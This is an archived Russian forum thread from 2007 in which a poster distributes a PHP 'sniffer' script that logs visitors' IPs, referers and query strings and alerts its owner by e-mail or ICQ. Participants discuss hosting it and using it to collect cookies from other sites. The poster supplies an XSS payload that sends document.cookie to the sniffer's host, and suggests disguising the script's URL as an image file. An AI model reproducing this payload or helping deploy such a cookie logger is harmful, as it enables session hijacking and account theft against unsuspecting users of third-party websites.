PDA

Просмотр полной версии : [php] Http сниффер


Developer
28.04.2007, 17:32
Ранее уже как-то писал сниффер, но так и не доходили руки организовать ICQ уведомления.

В общем, кратко о скрипте:

+ Сниффер находится в одном файле (может работать не зависимо от других файлов)
+ Возможность вывода изображения
+ Возможность уведомления по E-Mail (Используется функция mail)
+ Возможность просмотра логов (sniffer.php?go=view)
+ Возможность уведомления по ICQ (Интеграция с классом WebIcqPro. Работает только на PHP5)

В архиве вы найдете файлы:
+ sniffer.php (сниффер)
+ WebIcqPro.class.php (Расширение для работы с ICQ от стороннего разработчика)
+ mygif.gif (Картинка для вывода)
+ log.txt (Лог-файл)

Перед тем, как заливать файл на сервер, откройте файл sniffer.php и отредактируйте мини-конфиг в начале файла ;)

http://slil.ru/24304415
Password: antichat

a1ex
28.04.2007, 17:35
Ща заценим....

Developer
28.04.2007, 17:37
Сообщения по ICQ приходят в таком виде:

[DD.MM.YYYY HH:II:SS] The new query on sniffer has arrived

TIME<|>PROXYIP<|>REALIP<|>PORT<|>REFERER<|>BROWSER<|>QUERY

ЗЫ: Можно написать .htaccess и положить его в папку с сниффером, для того чтобы можно было обращаться к снифферу на ".../sniffer.php", а ".../cool.gif".

grozglaz
29.04.2007, 07:59
Я скачал архив, на каком хосте выложеть не в курсе???
З.Ы Если WebIcqPro.class.php удалить, сниф работать будет??

byblik
29.04.2007, 08:27
Работает как часы (китайские) :)

grozglaz
29.04.2007, 08:42
Када открываешь снифер, там текст вылазиет.
Объясните на пальцах, как chmode поставить, как писать и куда. ПлиZZZ

Developer
29.04.2007, 09:28
Для работы необходимо залить только один файл на хост - sniffer.php. Лог-файл должен создаваться сам (Но для больших гарантий лучше его все-таки залить в ручную и поставить права 777).
Если изображение, указанное в конфиги не найдено - оно грузиться не будет, просто будет пустая страничка.
Если файл WebICQPro не найден - уведомления по ICQ рассылаться не будут.

Када открываешь снифер, там текст вылазиет.

Какой текст? При запросе на сниффер либо картинка либо ничего вообще.

Но если прописать в адресной строке .../sniffer.php?go=view, то откроется лог файл. Там данным пишутся в следующем формате:
TIME<|>PROXYIP<|>REALIP<|>PORT<|>REFERER<|>BROWSER<|>QUERY

grozglaz
29.04.2007, 10:51
http://logsnif.narod.ru/sniffer.php я на народ кинул, но php вроде он не держит.
куда его кунуть?? На какой хост, дай адресс

grozglaz
29.04.2007, 13:00
Фсёёё Работает, а как сделать что бы куки сохранял тоже, оч надо. Молодца!!

Fr-Ron
29.04.2007, 13:07
Чтобы снифер сохранял куки, нужно найти Xss на сайте, с которого кукис надо. Почитай статьи, иначе ничего не поймешь...

grozglaz
29.04.2007, 14:14
Я в курсе про Хss, в сниффере просто функции куки сохранять нет

Gashik
29.04.2007, 14:16
Попробовал ваш сниффер поставить но не удачно....что то он не отображает данные :mad: Конфиг я менял точнее файл sniffer.php В чём может быть проблема??

grozglaz
29.04.2007, 14:57
У мя всё работае, поменяй тока е маил, и всё, размести на хосте где php работает. У мя тоже с начало не получилось, а ща ок.
З.Ы Добавь куки, плиZZZ

Developer
29.04.2007, 20:03
Причем тут куки? :) Куки нада передовать в строку запроса.

grozglaz
30.04.2007, 03:26
Ну можно же вставить скрипт, найти Хss вставить ссылку на форуме, и куки записываются в лог.

Developer
05.05.2007, 22:03
XSS на отправку кукиксов пишется примерно так:

<script>img = new Image(); img.src = "http://mysite.com/sniffer.gif?" + document.cookie;</script>

Developer
05.05.2007, 22:04
Докажи, что бывают ситуации, что нужно записать в файл $_cookie и я добавлю эту опцию :)))

Developer
10.05.2007, 20:47
Ммм.. А если фреймом открыть, куки будут видны?

ENFIX
10.05.2007, 21:04
Перезалейте ктонить плз

@ps1k
10.05.2007, 22:29
Up

перезалейте плз, немогу скачать

Developer
11.05.2007, 19:23
Кто скачал, пусть перезальет, а то я куда-то удалил наработки :)

almaz
03.12.2007, 14:49
Пожалуйста перезалете это сниффер...